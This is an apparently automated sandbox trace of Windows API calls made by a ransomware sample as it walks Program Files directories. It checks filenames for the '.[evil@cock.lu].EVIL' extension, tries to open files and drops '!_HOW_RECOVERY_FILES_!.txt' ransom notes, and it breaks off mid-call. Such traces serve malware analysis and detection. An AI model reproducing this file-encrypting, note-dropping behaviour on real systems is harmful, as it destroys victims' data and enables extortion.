(_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipstr.xml") returned 0x0 [0088.648] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 0x3d [0088.648] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.649] GetLastError () returned 0x5 [0088.649] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.649] wcsstr (_Str="it-IT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.649] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 57 [0088.649] wcscmp (_String1=".", _String2="it-IT") returned -1 [0088.649] wcscmp (_String1="..", _String2="it-IT") returned -1 [0088.649] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 0x39 [0088.649] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 0x0 [0088.649] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*" [0088.649] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd860 [0088.649] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.649] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\.") returned 59 [0088.649] wcscmp (_String1=".", _String2=".") returned 0 [0088.649] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.649] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.649] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\..") returned 60 [0088.649] wcscmp (_String1=".", _String2="..") returned -1 [0088.649] wcscmp (_String1="..", _String2="..") returned 0 [0088.649] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.649] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.649] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 73 [0088.649] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.649] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.649] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 0x49 [0088.649] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.650] GetLastError () returned 0x5 [0088.650] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.650] FindClose (in: hFindFile=0x84b11dd860 | out: hFindFile=0x84b11dd860) returned 1 [0088.650] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 0x39 [0088.650] strlen (_Str="${KEY}") returned 0x6 [0088.650] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.650] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.650] strlen (_Str="${CODE}") returned 0x7 [0088.650] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.650] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.650] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.650] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.651] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.651] __uncaught_exception () returned 0x84b1160800 [0088.651] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.652] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.652] wcsstr (_Str="ja-JP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.652] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 57 [0088.652] wcscmp (_String1=".", _String2="ja-JP") returned -1 [0088.652] wcscmp (_String1="..", _String2="ja-JP") returned -1 [0088.652] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 0x39 [0088.652] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 0x0 [0088.652] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*" [0088.652] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd320 [0088.652] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.652] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\.") returned 59 [0088.652] wcscmp (_String1=".", _String2=".") returned 0 [0088.652] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.652] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.652] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\..") returned 60 [0088.652] wcscmp (_String1=".", _String2="..") returned -1 [0088.652] wcscmp (_String1="..", _String2="..") returned 0 [0088.652] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.652] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.652] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 73 [0088.652] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.652] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.652] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui") returned 0x49 [0088.652] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.652] GetLastError () returned 0x5 [0088.652] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.652] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0088.653] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 0x39 [0088.653] strlen (_Str="${KEY}") returned 0x6 [0088.653] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.653] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.653] strlen (_Str="${CODE}") returned 0x7 [0088.653] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.653] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.653] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.653] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.653] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.653] __uncaught_exception () returned 0x84b1160800 [0088.653] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.654] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.654] wcsstr (_Str="journal.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.654] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\journal.dll") returned 63 [0088.654] wcscmp (_String1="journal.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.654] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="journal.dll") returned 0x0 [0088.654] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\journal.dll") returned 0x3f [0088.654] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.654] GetLastError () returned 0x5 [0088.654] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.654] wcsstr (_Str="ko-KR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.654] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 57 [0088.654] wcscmp (_String1=".", _String2="ko-KR") returned -1 [0088.654] wcscmp (_String1="..", _String2="ko-KR") returned -1 [0088.654] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 0x39 [0088.654] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 0x0 [0088.654] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*" [0088.654] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd8c0 [0088.655] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\.") returned 59 [0088.655] wcscmp (_String1=".", _String2=".") returned 0 [0088.655] FindNextFileW (in: hFindFile=0x84b11dd8c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.655] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\..") returned 60 [0088.655] wcscmp (_String1=".", _String2="..") returned -1 [0088.655] wcscmp (_String1="..", _String2="..") returned 0 [0088.655] FindNextFileW (in: hFindFile=0x84b11dd8c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.655] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 73 [0088.655] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.655] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.655] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 0x49 [0088.655] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.656] GetLastError () returned 0x5 [0088.656] FindNextFileW (in: hFindFile=0x84b11dd8c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.656] FindClose (in: hFindFile=0x84b11dd8c0 | out: hFindFile=0x84b11dd8c0) returned 1 [0088.656] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 0x39 [0088.656] strlen (_Str="${KEY}") returned 0x6 [0088.656] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.656] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.656] strlen (_Str="${CODE}") returned 0x7 [0088.656] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.656] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.656] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.656] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.656] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.657] __uncaught_exception () returned 0x84b1160800 [0088.657] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.657] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.657] wcsstr (_Str="LanguageModel", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.657] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 65 [0088.657] wcscmp (_String1=".", _String2="LanguageModel") returned -1 [0088.657] wcscmp (_String1="..", _String2="LanguageModel") returned -1 [0088.657] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 0x41 [0088.657] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 0x0 [0088.657] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*" [0088.657] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd680 [0088.658] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.658] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\.") returned 67 [0088.658] wcscmp (_String1=".", _String2=".") returned 0 [0088.658] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.658] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.658] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\..") returned 68 [0088.658] wcscmp (_String1=".", _String2="..") returned -1 [0088.658] wcscmp (_String1="..", _String2="..") returned 0 [0088.658] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.658] wcsstr (_Str="chstic.dgml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.658] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 77 [0088.658] wcscmp (_String1="chstic.dgml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.658] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="chstic.dgml") returned 0x0 [0088.658] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 0x4d [0088.658] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.658] GetLastError () returned 0x5 [0088.658] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.658] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0088.658] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel") returned 0x41 [0088.658] strlen (_Str="${KEY}") returned 0x6 [0088.658] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.658] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.658] strlen (_Str="${CODE}") returned 0x7 [0088.658] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.658] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.658] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.658] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.659] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.659] __uncaught_exception () returned 0x84b1160800 [0088.659] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.660] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.660] wcsstr (_Str="lt-LT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.660] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 57 [0088.660] wcscmp (_String1=".", _String2="lt-LT") returned -1 [0088.660] wcscmp (_String1="..", _String2="lt-LT") returned -1 [0088.660] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 0x39 [0088.660] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 0x0 [0088.660] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*" [0088.660] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddbc0 [0088.660] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.660] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\.") returned 59 [0088.660] wcscmp (_String1=".", _String2=".") returned 0 [0088.660] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.660] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.660] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\..") returned 60 [0088.660] wcscmp (_String1=".", _String2="..") returned -1 [0088.660] wcscmp (_String1="..", _String2="..") returned 0 [0088.660] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.660] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.660] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 73 [0088.660] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.660] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.660] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui") returned 0x49 [0088.660] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.661] GetLastError () returned 0x5 [0088.661] FindNextFileW (in: hFindFile=0x84b11ddbc0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.661] FindClose (in: hFindFile=0x84b11ddbc0 | out: hFindFile=0x84b11ddbc0) returned 1 [0088.661] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 0x39 [0088.661] strlen (_Str="${KEY}") returned 0x6 [0088.661] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.661] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.661] strlen (_Str="${CODE}") returned 0x7 [0088.661] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.661] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.661] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.661] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.662] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.662] __uncaught_exception () returned 0x84b1160800 [0088.662] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.663] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.663] wcsstr (_Str="lv-LV", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.663] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 57 [0088.663] wcscmp (_String1=".", _String2="lv-LV") returned -1 [0088.663] wcscmp (_String1="..", _String2="lv-LV") returned -1 [0088.663] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 0x39 [0088.663] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 0x0 [0088.663] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*" [0088.663] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd7a0 [0088.663] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.663] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\.") returned 59 [0088.663] wcscmp (_String1=".", 